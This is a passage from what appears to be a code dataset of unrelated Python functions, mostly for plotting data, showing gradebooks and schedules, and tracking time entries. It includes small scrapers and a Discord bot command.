p.read_csv('/ml.dev/bin/data/oanda/ticks/{0}/{0}-M5.csv'.format(pa[i])).sort(ascending=True).tail(50).ix[:,'closeAsk']\n plot(dfp)\n title('{0} Forecast'.format(pa[i]))\n legend(gr)\n show();\n #break", "def view_student_gradebook():\n\n user_id = session.get('user_id')\n courses = []\n grades = []\n con = db.get_db()\n cur = con.cursor()\n\n cur.execute(\"\"\"SELECT DISTINCT courses.course_id, (ROUND(sum(grades.points_received)/sum(grades.total_points), 2 )*100)\n as total_grade, roster.session_id as class_session,\n courses.name as class_name, users.name AS teacher_name, grades.student_id\n FROM courses JOIN sessions on courses.course_id = sessions.course_id\n\t\t\t\t JOIN users on courses.teacherid= users.id\n JOIN assignments on assignments.session_id = sessions.id\n JOIN grades on grades.assignment_id = assignments.assignment_id\n JOIN roster on roster.session_id = sessions.id\n WHERE grades.student_id = %s\n\t GROUP BY grades.student_id, roster.session_id, courses.course_id, users.id\"\"\",\n (user_id,))\n courses = cur.fetchall()\n\n cur.close()\n con.close()\n\n return render_template(\"/layouts/gradebook/student_view.html\", courses=courses)", "def display_time(time_spent, results):\n\n time_list = results.split(',')\n\n if time_list[2] == time_spent:\n print('Date : {}'.format(time_list[0]))\n print('Title : {}'.format(time_list[1]))\n print('Time Spent : {}'.format(time_list[2]))\n print('Notes : {}'.format(time_list[3]))\n clear()", "def do_ls_table(tpath):\n table = provider.get_type_table(tpath)\n 
try:\n runs = run.split('-')\n ass = provider.get_assignment(tpath, runs[0], var)\n except:\n print \"no entry found\"\n return\n print \"run range:\", \"{0}-{1}\".format(ass.run_range.min, ass.run_range.max)\n print \"variation:\", ass.variation.name\n print \"modified:\", ass.modified\n print \"comment:\", ass.comment\n print \"author:\", ass.author.name", "def display_result(ilist):\n r = \"1min Interval Report:\\n\\n\"\n r += \"Deck\\tCount\\t% Total\\t% in Learn\\n\"\n for l in ilist:\n r += \"%s\\t%d\\t%0.1f\\t%0.1f\\n\" % (l[0], l[1], l[2], l[3])\n showText(r)", "def display_time_stats(self):\n\n self.time_frame = stat_display_labels(\n self.stats_frame,\n \"Time Stats\",\n [\n \"The busiest month was:\",\n \"The busiest day of the week was:\",\n \"The busiest start hour was:\",\n ],\n row=0,\n columnspan=2,\n )\n self.time_stats_data = tk.Label(self.time_frame, justify=\"left\")\n self.time_stats_data.grid(row=0, column=2)", "def plot_table(timestamps: dict, threadList: list, mList: list) -> None:\n plt.plot(threadList, timestamps.values(), 'o-')\n plt.legend(mList, title = 'Total valores', loc='best', bbox_to_anchor=(0.5, 0., 0.5, 0.5))\n plt.xlabel('Número de processos')\n plt.ylabel('Tempo de Execução (s)')\n plt.title('Tempo de Execução por Total de Processos e Valores')\n plt.show()", "def dump_lots(args: argparse.Namespace) -> None:\n engine = create_engine()\n dump_csv(\n engine,\n dtstart=args.dtstart,\n dtend=args.dtend,\n dtstart_gains=datetime.max,\n consolidate=args.consolidate,\n lotloadfile=args.loadcsv,\n lotdumpfile=args.file,\n )", "def __ui_list_grades_by_student(self):\n student_id = input(\"Give student ID: \")\n try:\n list_of_grades = self.__grade_controller.get_grades_by_student(student_id)\n if len(list_of_grades) == 0:\n print(\"Student doesn't have any grade.\")\n return\n\n for g in list_of_grades:\n print(str(g))\n\n except GradeException as ge:\n print(ge)\n return", "def visualise_hourly_arrivals_at_each_lab(tests_dataframe):\r\n labs_df = create_dataframe_from_csv('labs.csv')\r\n labs_df = drop_missing_values_in_dataframe(labs_df)\r\n list_of_labs = labs_df['lab_name'].to_list()\r\n for lab_name in list_of_labs:\r\n df = tests_dataframe.loc[tests_dataframe['lab_name'] == lab_name]\r\n df.time_test_arrives_lab = pd.to_datetime(df.time_test_arrives_lab)\r\n df = df.sort_values(by=\"time_test_arrives_lab\")\r\n df = df[['time_test_arrives_lab']]\r\n df = df.reset_index().set_index('time_test_arrives_lab')\r\n df = df.resample('H').count()\r\n df.plot(title = 'hourly arrivals at ' + lab_name)\r\n plt.show()", "def print_list(schedule):\n START_TIME = 0\n END_TIME = 1\n MEETING_TITLE = 2\n print(\"\\nYour schedule for the day:\")\n if len(schedule) == 0:\n print(\"(empty)\\n\")\n else:\n for row in schedule:\n print(\n f\"{row[START_TIME]} - {row[END_TIME]} {row[MEETING_TITLE]}\")\n print(\"\\n\")", "def Chart3PTL(tickerListing, years=5, verbose_mode=False): \n List = tickerListing.split()\n chatty = verbose_mode\n for i in List:\n print(i)\n PlotTimeSeries(i, years, verbose_mode=chatty)", "def show_plot(times, zones, combined, labels):\r\n\r\n #Inform user of current action\r\n print(\"Loading plots...\")\r\n\r\n #If less than 25 aggregated data points, draw bar plots\r\n if len(times) < 25:\r\n plot_drawer = draw_bar_plot\r\n #Else, draw line plots\r\n else:\r\n plot_drawer = draw_line_plot\r\n\r\n #If zone energy usage should be shown combined, draw combined plot\r\n if combined:\r\n draw_combined(times, zones, plot_drawer, labels)\r\n #Else, draw plots 
for each zone\r\n else:\r\n draw_zones(times, zones, plot_drawer, labels)\r\n\r\n\r\n #Print instructions for how to continue\r\n print(\"Close plots window to continue...\", end=\"\\n\\n\")\r\n\r\n\r\n #Show finished plot\r\n #NOTE: Blocks thread until GUI is closed\r\n plt.show()", "def get_times():\n global times\n global times_list\n base_url = \"http://www.crawleymosque.com/\"\n r = requests.get(base_url)\n soup = BeautifulSoup(r.text, features=\"html.parser\")\n\n times_list = []\n for salah_time in soup.find_all(class_=\"prayer-start\"):\n times_list.append(salah_time.contents[0].strip())\n\n print(times_list)\n times = []\n for i in times_list:\n datetime_object = datetime.strptime(i, \"%I:%M %p\")\n just_time = datetime.time(datetime_object)\n times.append(just_time)\n\n print(times)\n\n # spam = Label(root, text=\"checking for spam\")\n # spam.place(x=460, y=110)", "def main():\n\n students = [\"Chris\", \"Jesse\", \"Sally\"]\n grades = [90, 80, 70]\n print_gradebook(students, grades)", "def print_grades(grades_input):\n for grade in grades_input:\n print grade", "def printOffByOne():\n data = load_yield_data()\n numberColumns = 5\n firstEntry = 'tmax5'\n lastEntry = 'lstmax9'\n colNames = list(data)\n firstIndex =colNames.index(firstEntry)\n lastIndex = colNames.index(lastEntry)\n numberTypesOfVariables = 5\n months = 5\n variables = ['tave5', 'tave6', 'tave7', 'tave8', 'tave9', 'vpdave5', 'vpdave6', 'vpdave7', 'vpdave8', 'vpdave9', 'precip5', 'precip6', 'precip7', 'precip8', 'precip9', 'evi5', 'evi6', 'evi7', 'evi8', 'evi9', 'lstmax5', 'lstmax6', 'lstmax7', 'lstmax8', 'lstmax9']\n variables = ['tave5', 'tave6', 'tave7', 'tave8', 'tave9', 'vpdave5', 'vpdave6', 'vpdave7', 'vpdave8', 'vpdave9', 'precip5', 'precip6', 'precip7', 'precip8', 'precip9', 'evi5', 'evi6', 'evi7', 'evi8', 'evi9', 'lstmax5', 'lstmax6', 'lstmax7', 'lstmax8', 'lstmax9']\n print(firstIndex, lastIndex)\n print(colNames)\n for i in range(len(variables)):\n plt.plot(data[variables[i]], data[\"yield_rainfed_ana\"],'bx')\n plt.title([variables[i]])\n Z = lowess(data['yield_rainfed_ana'], data[variables[i]],frac=0.3,it=3)\n plt.plot(Z[:,0], Z[:,1], 'g-', lw=5)\n plt.title(\"Response for %s\"%(variables[i]))\n plt.show()", "def print_time_stats(self):\n walk_total = 0\n bus_total = 0\n for passenger in self.passengers:\n time = self._passenger_trip_time(passenger)\n walk_total += time[\"walk\"]\n bus_total += time[\"bus\"]\n av_bus_time = bus_total / self.total_passengers\n av_walk_time = walk_total / self.total_passengers\n\n print(f\"Average time on bus: {av_bus_time:.0f} min\")\n print(f\"Average walking time: {av_walk_time:.0f} min\")", "def output_tasks_launched_versus_time(self, output_directory):\r\n gnuplot_file = open(\"%s/task_launches_vs_time.gp\" % output_directory, \"w\")\r\n gnuplot_file.write(\"set terminal postscript color 'Helvetica' 12\\n\")\r\n gnuplot_file.write(\"set output '%s/task_launches_vs_time.ps'\\n\" % output_directory)\r\n gnuplot_file.write(\"set xlabel 'Time (ms)'\\n\")\r\n gnuplot_file.write(\"set ylabel 'Tasks Launched'\\n\")\r\n gnuplot_file.write(\"plot \")\r\n\r\n job_count = 0\r\n for id, request in self.__requests.items():\r\n results_filename = \"%s/%s_tasks_launched_vs_time\" % (output_directory, id)\r\n file = open(results_filename, \"w\")\r\n arrival_time, reservation_replies = request.get_scheduler_get_task_times()\r\n reservation_count = 0\r\n file.write(\"0\\t0\\n\")\r\n for reservation in reservation_replies:\r\n reservation_count += 1\r\n # Write the elapsed time since 
the request arrived.\r\n file.write(\"%s\\t%s\\n\" % (reservation - arrival_time, reservation_count))\r\n file.close()\r\n\r\n if job_count != 0:\r\n gnuplot_file.write(\",\\\\\\n\")\r\n gnuplot_file.write(\"'%s' using 1:2 lw 1 with lp\" % results_filename)\r\n job_count += 1\r\n if job_count >= 20:\r\n break\r\n gnuplot_file.close()", "def view_data():\n with open(\"./timetracker.csv\", \"r\", newline=\"\") as fileX:\n # reading csv file\n reader = csv.reader(fileX)\n\n # designing dataframe for saved data\n print(\"\\n\\t\\t\\t\\tSaved Data\", end=\"\\n\\t\\t\\t\\t\")\n print(\"*\" * 10, end=\"\\n\\n\")\n print(\"Date\", (\" \"*10)+\"Start time\", (\" \"*3)+\"AM/PM\", (\" \"*4)+\"End time\", \n (\" \"*5)+\"AM/PM\", (\" \"*4)+\"Hours\", (\" \"*3)+\"Mins\", (\" \"*2)+\"Amount earned($)\")\n print(\"-\" * 94)\n \n Total_hours = 0\n Total_mins = 0\n Total_amount = 0\n for row in reader:\n Total_hours += int(row[5])\n Total_mins += int(row[6])\n Total_amount += float(row[7])\n print(\"\\n\")\n for i in range(len(row)):\n print(row[i], end=\" \" * 8)\n\n print(\"\\n\\n\\nTotal number of hours worked = {}\".format(Total_hours))\n print(\"-\" * 35)\n print(\"Total number of minutes worked = {}\".format(Total_mins))\n print(\"-\" * 35)\n print(\"Total amount earned = ${:.2f}\".format(Total_amount))\n print(\"-\" * 35)\n print(\"\\nThanks for using Time Tracker!❤\\n\")", "def print_schedule(self):\n for entry in self.entries:\n print(entry.get_entry_string())", "def plot_trinity(time, data, lgnd=None):\n pylab.figure()\n pylab.plot(time, data)\n pylab.xlabel('time, s')\n pylab.ylabel('data')\n pylab.title('Triad Plotter')\n if lgnd != None:\n pylab.legend((lgnd[0], lgnd[1], lgnd[2]))\n pylab.grid(True)\n\n pylab.show()", "async def listlaunches(self, ctx, *args):\n if not can_answer(ctx):\n return\n num = 5\n for arg in args:\n if arg.isdigit():\n num = int(arg)\n launches = launchlibrary.Launch.fetch(api, status=(1,2))[:num]\n if launches[0].agency != None:\n embedcolor = discord.Colour(await get_color(launches[0].agency.id))\n else:\n embedcolor = discord.Colour(5592405)\n msg = discord.Embed(title=\"Listing next launches: \", colour=embedcolor)\n IDs = []\n for launch in launches:\n launchtime = launch.net\n utc = datetime.now(timezone.utc)\n T = chop_microseconds(launchtime - utc)\n if launch.status == 1:\n value = \"T-: {0}\".format(T)\n else:\n value = \"T-: {0}; {1}\".format(T, launch.get_status().name)\n msg.add_field(name=launch.name, value=value, inline=False)\n IDs.append(launch.id)\n footer = 'IDs: ' + ', '.join(str(x) for x in IDs)\n msg.set_footer(text=footer)\n await ctx.send(embed=msg)", "def screen_lines_for_time(self, day, time):\n if day in self.tutors and time in self.tutors[day]:\n current = self.tutors[day][time]\n else:\n current = []\n\n if len(current) > 0:\n return [Line(\"Current Tutors:\")] + [Line(person) for person in current]\n else:\n return [Line(\"No Tutors on Duty\", center=True)]", "def view_attendance(request):\n\n\tcontext_dict = {\n\t\t'title': 'All Attendance',\n\t}\n\treturn render(request, \"viewAttendance.html\", context_dict)", "def plot_tap(file: str, before: DataFrame, during: DataFrame, after: DataFrame, time_col: str):\n\n print(\"Making plots at time \" + str(before[time_col].iloc[0]))\n\n for file_name in file_names:\n for y in y_columns[file_name]:\n\n ax = before.plot(time_col, y, kind = 'scatter', color = 'blue', label = 'Before Tap')\n after.plot(time_col, y, kind = 'scatter', color = 'red', label = 'After Tap', ax = ax)\n during.plot(time_col, 
y, kind = 'scatter', color = 'black', label = 'During Tap', ax = ax)\n plt.axes(ax)\n plt.xlabel('Event Time')\n plt.ylabel(y)\n\n min_x = before[time_col].iloc[0] - (before[time_col].iloc[1] - before[time_col].iloc[0]) * 50\n min_y = min([min(during[y]), min(before[y]), min(after[y])])\n # Mark the mean during tap event (Feature 1)\n mean_during = mean(during[y])\n mean_before = mean(before[y])\n mean_after = mean(after[y])\n plt.hlines(y = mean_during, xmin = min_x, xmax = during[time_col].iloc[-1], linestyle='dashed', \\\n color='black')\n plt.annotate(xy = (min_x, mean_during), s = 'avgDuringTap')\n # Mark the mean before\n plt.hlines(y = mean_before, xmin = min_x, xmax = before[time_col].iloc[-1], linestyle='dashed', \\\n color='blue')\n plt.annotate(xy = (min_x, mean_before), s = 'avg100msBefore')\n # Mark the mean after\n plt.hlines(y = mean_after, xmin = min_x, xmax = after[time_col].iloc[-1], linestyle='dashed', \\\n color='red')\n plt.annotate(xy = (min_x, mean_after), s = 'avg100msAfter')\n\n plt.legend()\n\n plt.savefig(file+'_'+y+'_time_'+str(before[time_col].iloc[0]) + '.png')\n\n plt.close()", "def about(request, pk=None):\n if pk and get_grouptype('3') in request.user.groups.all():\n ts = get_object_or_404(TimeSlot, pk=pk)\n else:\n ts = get_timeslot()\n return render(request, \"results/about_grades.html\", {\n 'scores': CategoryAspectResult.ResultOptions,\n \"categories\": GradeCategory.objects.filter(TimeSlot=ts),\n 'ts': ts,\n })", "def list_tables(option, opt, value, parser):\n print \"CCP Data Dump Table List\"\n print \"------------------------\"\n for table in util.IMPORT_LIST:\n print \"%s\" % table.__name__.replace('Importer_', '')\n print \"-- %d tables --\" % len(util.IMPORT_LIST)\n # The -l argument is just used for listing, proceed no further.\n exit_with_succ()", "def get_students_problem_grades(request, csv=False):\r\n module_state_key = Location.from_deprecated_string(request.GET.get('module_id'))\r\n csv = request.GET.get('csv')\r\n\r\n # Query for \"problem grades\" students\r\n students = models.StudentModule.objects.select_related('student').filter(\r\n module_state_key=module_state_key,\r\n module_type__exact='problem',\r\n grade__isnull=False,\r\n ).values('student__username', 'student__profile__name', 'grade', 'max_grade').order_by('student__profile__name')\r\n\r\n results = []\r\n if not csv:\r\n # Restrict screen list length\r\n # Adding 1 so can tell if list is larger than MAX_SCREEN_LIST_LENGTH\r\n # without doing another select.\r\n for student in students[0:MAX_SCREEN_LIST_LENGTH + 1]:\r\n student_dict = {\r\n 'name': student['student__profile__name'],\r\n 'username': student['student__username'],\r\n 'grade': student['grade'],\r\n }\r\n\r\n student_dict['percent'] = 0\r\n if student['max_grade'] > 0:\r\n student_dict['percent'] = round(student['grade'] * 100 / student['max_grade'])\r\n results.append(student_dict)\r\n\r\n max_exceeded = False\r\n if len(results) > MAX_SCREEN_LIST_LENGTH:\r\n # Remove the last item so list length is exactly MAX_SCREEN_LIST_LENGTH\r\n del results[-1]\r\n max_exceeded = True\r\n\r\n response_payload = {\r\n 'results': results,\r\n 'max_exceeded': max_exceeded,\r\n }\r\n return JsonResponse(response_payload)\r\n else:\r\n tooltip = request.GET.get('tooltip')\r\n filename = sanitize_filename(tooltip[:tooltip.rfind(' - ')])\r\n\r\n header = [_(\"Name\").encode('utf-8'), _(\"Username\").encode('utf-8'), _(\"Grade\").encode('utf-8'), _(\"Percent\").encode('utf-8')]\r\n for student in students:\r\n\r\n percent = 0\r\n 
if student['max_grade'] > 0:\r\n percent = round(student['grade'] * 100 / student['max_grade'])\r\n results.append([student['student__profile__name'], student['student__username'], student['grade'], percent])\r\n\r\n response = create_csv_response(filename, header, results)\r\n return response", "async def _timein_list(self):\n\t\t\n\t\tmessage = 'Favourites\\n```Name: Timezones\\n'\n\t\t\n\t\tfor fav in self.favourites:\n\t\t\tmessage += fav + ': '\n\t\t\tmessage += self.favourites[fav].replace(',', ', ').replace('_', ' ') + '\\n'\n\t\t\n\t\tmessage += '```'\n\t\tawait self.bot.say(message)", "def generate_access_time_plot(id_lists):\n bins = [1]\n points = []\n for l in id_lists:\n mapped = [(x, bins[-1]) for x in l]\n points += mapped\n bins.append(bins[-1] + 1)\n return points, bins", "def sna_viz(request):\n timestamps = []\n for i in Source.objects.filter(user=request.user):\n timestamps.append({'id':i.source_id, 'val':i.datetime_extracted.strftime('%d/%m/%Y %H:%M') + \" \" + i.source})\n return render(request, 'sna_viz.html', {'timestamps':timestamps})", "def print_grades(grades, grader_name):\n grades = sorted(grades,\n key=lambda grade: grade.student_name())\n # Length of longest name\n max_name_len = max(len(grade.student_name()) for grade in grades)\n\n grade_report = '\\n'.join(\n '{:<{max_name_len}}\\t{}\\t{}'.format(\n grade.student_name(),\n grade.score() if grade.graded() else '(ungraded)',\n grade.breakdown(grader_name) if grade.graded() else '',\n max_name_len=max_name_len)\n for grade in grades)\n click.echo_via_pager('grade report:\\n\\n' + grade_report)", "def plot_overscan_variation(t_lst, overscan_lst, figfile):\n \n # Quality check plot of the mean overscan value over time \n fig = plt.figure(figsize=(8,6), dpi=150)\n ax2 = fig.add_axes([0.1,0.60,0.85,0.35])\n ax1 = fig.add_axes([0.1,0.15,0.85,0.35])\n #conversion of the DATE-string to a number\n date_lst = [dateutil.parser.parse(t) for t in t_lst]\n datenums = mdates.date2num(date_lst)\n\n ax1.plot_date(datenums, overscan_lst, 'r-', label='mean')\n ax2.plot(overscan_lst, 'r-', label='mean')\n for ax in fig.get_axes():\n leg = ax.legend(loc='upper right')\n leg.get_frame().set_alpha(0.1)\n ax1.set_xlabel('Time')\n ax2.set_xlabel('Frame')\n ax1.set_ylabel('Overscan mean ADU')\n ax2.set_ylabel('Overscan mean ADU')\n # adjust x and y limit\n y11,y12 = ax1.get_ylim()\n y21,y22 = ax2.get_ylim()\n z1 = min(y11,y21)\n z2 = max(y21,y22)\n ax1.set_ylim(z1,z2)\n ax2.set_ylim(z1,z2)\n ax2.set_xlim(0, len(overscan_lst)-1)\n # adjust rotation angle of ticks in time axis\n plt.setp(ax1.get_xticklabels(),rotation=30)\n\n # save figure\n fig.savefig(figfile)\n plt.close(fig)", "def tentative_schedule(request):\n\n\tshows_dict = {\n\t\t0: [],\n\t\t1: [],\n\t\t2: [],\n\t\t3: [],\n\t\t4: [],\n\t\t5: [],\n\t\t6: []\n\t}\n\n\tfor i in range(7):\n\t\tfor show in Show.objects.filter(day=i).order_by('time'):\n\t\t\t\tshow_time = show.time\n\t\t\t\tdj = str(show.dj)\n\t\t\t\tif show.co_dj and str(show.co_dj) != \"Unknown Dj\":\n\t\t\t\t\tdj += \" & \" + str(show.co_dj)\n\t\t\t\tshows_dict[i].append([dj, show_time.strftime('%I:%M %p')])\n\n\treturn render(request, 'tentative_schedule.html', {\n\t\t\t'shows_dict': shows_dict\n\t})", "def visualizations():\r\n raise NotImplementedError\r\n # df = pandas.read_csv('accidents_by_hour.csv', index_col=0, header=0)\r\n # plt.plot(0, 0, data=df)\r\n # plt.show()\r", "def time_tracking(self):\n fb = FreshBooks()\n tg = Toggl()\n self.print_splash()\n self.print(\"Tip: You can always enter 'skip' when 
you want to skip a time entry.\", format='warn')\n days = self.get_interactive_days() # number of days to go back\n self.print(\"OK, I'll run you through the Toggl time entries of the past %i day(s).\" % (days))\n timestamp = self.get_timestamp(days) # unix timestamp including tz\n time_entries = tg.get_time_entries(timestamp)\n if len(time_entries) == 0:\n self.print(\"No Toggl entries in this time span!\", 'warn')\n return False\n time_entries = self.merge_toggl_time_entries(time_entries) # merge Toggl entries\n fb_projects = fb.get_projects()\n # Loop through merged Toggl time entries:\n for entry in time_entries:\n # Get and convert all necessary info:\n client_id = tg.get_client_id(project_id=entry.get('pid'))\n client_name = tg.get_client_name(client_id)\n project = tg.get_project(entry.get('pid'))\n duration = int(entry['duration']) / 60 / 60 # convert duration to hours\n duration = round(duration * 4 ) / 4 # round hours to nearest .25\n description = self.format_description(project['name'], entry['description'])\n date = str(parser.parse(entry['start']).date())\n # Print info in a nice way:\n self.print_divider(30)\n self.print(\"Description: \" + description)\n self.print(\"Date: \" + date)\n self.print(\"Hours spent: \" + str(duration))\n # Skip if Toggl entry is already booked:\n if entry.get('tags') and tg.BOOKED_TAG in entry['tags']:\n self.print(\"Skipping this entry because it is already in Freshbooks.\", 'cross')\n # Skip if duration is below 0.25:\n elif duration < 0.25:\n self.print(\"Skipping this entry because there are less than 0.25 hours spent.\", 'cross')\n # If billable, add to Freshbooks:\n elif entry['billable']:\n # Get FreshBooks project name through interactive search:\n try:\n self.print(\"Project: \\U0001F50D \")\n fb_project_name = self.interactive_search(fb_projects.keys(), client_name)\n # Handle KeyboardInterrupt\n except KeyboardInterrupt:\n answer = input(\"\\nKeyboardInterrupt! Skip current entry or quit time tracking? (S/q) \")\n if answer.lower() == 's' or answer == '':\n self.clear_lines(1)\n self.print(\"Skipping this entry.\", 'cross')\n continue\n else:\n self.clear_lines(1)\n self.print(\"Ok, stopping time tracking.\", 'cross')\n sys.exit()\n # If user requests so, skip this entry:\n self.clear_lines(1)\n if not fb_project_name:\n self.print(\"Skipping this entry.\", 'cross')\n continue\n # Otherwise, add entry to FreshBooks and tag Toggl entry/entries:\n self.print(\"Project: \" + fb_project_name)\n project_id = fb.get_project_id(fb_project_name)\n fb.add_entry(project_id, duration, description, date)\n tg.tag_projects(entry['merged_ids'], tg.BOOKED_TAG)\n # If not billable, skip entry:\n else:\n self.print(\"Skipping this entry because it is not billable.\", 'cross')\n self.print_divider(30)\n answer = input(\"All done! Open FreshBooks in browser to verify? 
(Y/n) \")\n if answer.lower() == 'y' or answer == '':\n webbrowser.open('https://%s.freshbooks.com/timesheet' % fb.fb_creds['subdomain'])", "def __statistics_students_failing(self):\n students_list = self.__grade_controller.get_list_of_failing_students()\n if len(students_list) == 0:\n print(\"There is no student failing!\")\n return\n\n for student in students_list:\n print(str(student) + \"\\n\")", "def test():\n data1 = resources_vs_time(0.0, 50)\n data2 = resources_vs_time(1.0, 10)\n data3 = resources_vs_time(2.0, 10)\n data4 = resources_vs_time(0.5, 10)\n print data1\n simpleplot.plot_lines(\"Growth\", 600, 600, \"time\", \"total resources\", [data1])", "def plot_table(self):\r\n q = dict(sorted(decorator.arr.items(), key=lambda item: item[1]))\r\n print(\"PROGRAM | RANK | TIME ELAPSED\")\r\n count = 1\r\n for i in q:\r\n print(i[0], \"\\t\", count, \"\\t\", float(q[i]) * 1000, \"ms\")\r\n count += 1", "def plot_timecourses(timecourses, output_file):\n\tpyplot.plot(timecourses)\n\tpyplot.savefig(output_file)", "def display(self):\n \n # initialize SQL kit to access database\n s = SQL_Kit(self.userID, self.password, self.database)\n \n \n \"\"\" Total Activity by hour \"\"\"\n \n # get activity data\n all_date_times = self.activity().index\n\n all_days = []\n all_hours = []\n for item in all_date_times:\n all_days.append((item.timetuple().tm_yday))\n all_hours.append(item.hour)\n\n x = all_days\n y = all_hours\n x_labels = pd.Series(all_days).unique()\n\n fig1, ax1 = plt.subplots()\n ax1.set_title('Hourly Activity')\n ax1.scatter(x,y,color='mediumspringgreen',linewidths=1)\n ax1.set_xlabel('day of year')\n ax1.set_ylabel('hour')\n ax1.xaxis.grid(True)\n\n if len(x_labels) > 5:\n ax1.xaxis.set_ticks([min(all_days), max(all_days)])\n else:\n ax1.xaxis.set_ticks(x_labels)\n\n ax1.yaxis.grid(False) \n plt.show()\n \n \n \"\"\" MOVING AVERAGE \"\"\"\n \n df = self.activity().reset_index()\n\n def day_of_year(datetime_entry):\n return datetime_entry.timetuple().tm_yday\n\n df['day_of_year'] = list(df.apply(lambda x: day_of_year(x['EventDateTime']),axis=1))\n daily_count = df['day_of_year'].value_counts().sort_index()\n\n averages = []\n i=1\n for value_count in daily_count:\n values = daily_count[:i]\n average = round(sum(values)/len(values),2)\n averages.append(average)\n i+=1\n\n day_list = list(df['day_of_year'].unique())\n\n avg_move_df = pd.DataFrame([day_list,averages]).T\n avg_move_df.rename(columns={0: 'day_id', 1: 'moving_avg'},inplace=True)\n avg_move_df.set_index('day_id',inplace=True)\n \n fig1, ax1 = plt.subplots()\n ax1.plot(avg_move_df.index.astype(int),avg_move_df['moving_avg'], color='mediumspringgreen')\n ax1.set_title('Moving AVG')\n ax1.set_xlabel('day_of_year')\n ax1.xaxis.set_ticks([min(all_days), max(all_days)])\n ax1.set_ylabel('Daily Activity')\n plt.show()\n \n \n \n \"\"\" Top 5 Samples \"\"\"\n \n data = s.select_table('sample')['SoundCategory'].value_counts()\n \n objects = list(data)[:5]\n y_pos = list(data.index)[:5]\n\n # get class info from class_absence_stats dataframe\n #fig2 = plt.figure(2) \n plt.bar(y_pos, objects, align='center', alpha=0.8, color='mediumspringgreen')\n plt.ylabel('Usage')\n plt.xlabel('Sound Category')\n plt.title('Top 5 Samples')\n plt.show()\n \n \n \"\"\" Top 3 Chords \"\"\"\n \n data = s.select_table('chord')['ChordLabel'].value_counts()\n\n objects = list(data)[:3]\n y_pos = list(data.index)[:3]\n\n # get class info from class_absence_stats dataframe\n #fig2 = plt.figure(2) \n plt.bar(y_pos, objects, align='center', alpha=0.8, 
color='mediumspringgreen')\n plt.ylabel('Usage')\n plt.xlabel('Chord Label')\n plt.title('Top 3 Chords')\n plt.show()\n \n \n \"\"\" Top 3 Wave Types \"\"\"\n \n # get SQL table data\n set_1 = s.select_table('createwave')\n set_2 = s.select_table('sequence')\n set_3 = s.select_table('arpeggio')\n set_4 = s.select_table('chord')\n\n # concat tables into single pandas series\n all_wave_types = pd.concat([set_1['WaveType'], set_2['WaveType'], set_3['WaveType'], set_4['WaveType']])\n\n # sort values, show top 3\n top_3 = all_wave_types.value_counts().head(3)\n\n\n # Pie chart, where the slices will be ordered and plotted counter-clockwise:\n labels = list(top_3.index)\n sizes = list(top_3.values)\n explode = (0, 0, 0) # only \"explode\" the 2nd slice (i.e. 'Hogs')\n\n fig1, ax1 = plt.subplots()\n ax1.pie(sizes, explode=explode, labels=labels, autopct='%1.1f%%',\n shadow=True, colors=['g','b','r'], startangle=90)\n ax1.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.\n ax1.set_title('Top Wave Types')\n\n plt.show()", "def plotLockTime(SVID, signalTypes, dataMeasSVID, lliIndices, lliTOWs, verbose):\n # print('\\nplotLockTime' + '-' * 25)\n gnssSyst, gnssSystShort, gnssPRN = mSSN.svPRN(SVID)\n\n # for i, signalType in enumerate(signalTypes):\n # print('PLT: signalType[%d] = %s' % (i, signalType))\n # print('PLT: TOW = %s (%d)' % (dataMeasSVID[i]['MEAS_TOW'], len(dataMeasSVID[i]['MEAS_TOW'])))\n # print('PLT: lockTimes = %s (%d)\\n' % (dataMeasSVID[i]['MEAS_LOCKTIME'], len(dataMeasSVID[i]['MEAS_LOCKTIME'])))\n # print(\"PLT: indexLossOfLock[%d] = %s (Nr = %d)\" % (i, lliIndices[i], len(lliIndices[i])))\n # # myData2 = dataMeasSVID[i][lliIndices[i]]\n # # print(\"PLT: myData2 = %s (len = %d)\" % (myData2['MEAS_TOW'], len(myData2['MEAS_TOW'])))\n # # print(\"PLT: idemand = %s (len = %d)\\n\" % (dataMeasSVID[i][lliIndices[i]]['MEAS_TOW'], len(dataMeasSVID[i][)lliIndices[i]]['MEAS_TOW']))\n\n # create the plot window\n # plt.style.use('BEGPIOS')\n plt.style.use('ggplot')\n plt.figure(1)\n subPlot = plt.subplot(1, 1, 1)\n # titles and axis-labels\n dateString = gpstime.UTCFromWT(float(dataMeasSVID[0]['MEAS_WNC'][0]), float(dataMeasSVID[0]['MEAS_TOW'][0])).strftime(\"%d/%m/%Y\")\n plt.title('Lock Times for %s PRN %d (%d)' % (gnssSyst, gnssPRN, SVID)) # , fontsize='18'\n plt.ylabel('Lock Time [s]')\n plt.xlabel('Time [hh:mm] (' + dateString + ')')\n\n for index, signalType in enumerate(signalTypes):\n # lockTime = dataMeasSVID[index]['MEAS_LOCKTIME']\n # print(\"index = %d lockTime.size = %d\" % (index, len(lockTime)))\n sigTypeColor = mPlt.getSignalTypeColor(signalType)\n\n utc = []\n for count in range(0, len(dataMeasSVID[index])):\n utc.append(gpstime.UTCFromWT(float(dataMeasSVID[index]['MEAS_WNC'][count]), float(dataMeasSVID[index]['MEAS_TOW'][count])))\n\n plt.plot(utc, dataMeasSVID[index]['MEAS_LOCKTIME'], color=sigTypeColor, linestyle='', markersize=0.75, marker='.')\n\n # add a marker at the LLI\n utc2 = []\n for count2 in range(0, len(dataMeasSVID[index][lliIndices[index]])):\n utc2.append(gpstime.UTCFromWT(float(dataMeasSVID[index][lliIndices[index]]['MEAS_WNC'][count2]), float(dataMeasSVID[index][lliIndices[index]]['MEAS_TOW'][count2])))\n plt.plot(utc2, dataMeasSVID[index][lliIndices[index]]['MEAS_LOCKTIME'], color=sigTypeColor, linestyle='', markersize=7, markerfacecolor=sigTypeColor, marker=mPlt.mFilledMarkers[signalType % len(mPlt.mFilledMarkers)])\n\n # annotate the plot\n annotateTxt = mSSN.GNSSSignals[signalType]['name'] + str(': %d LLI' % 
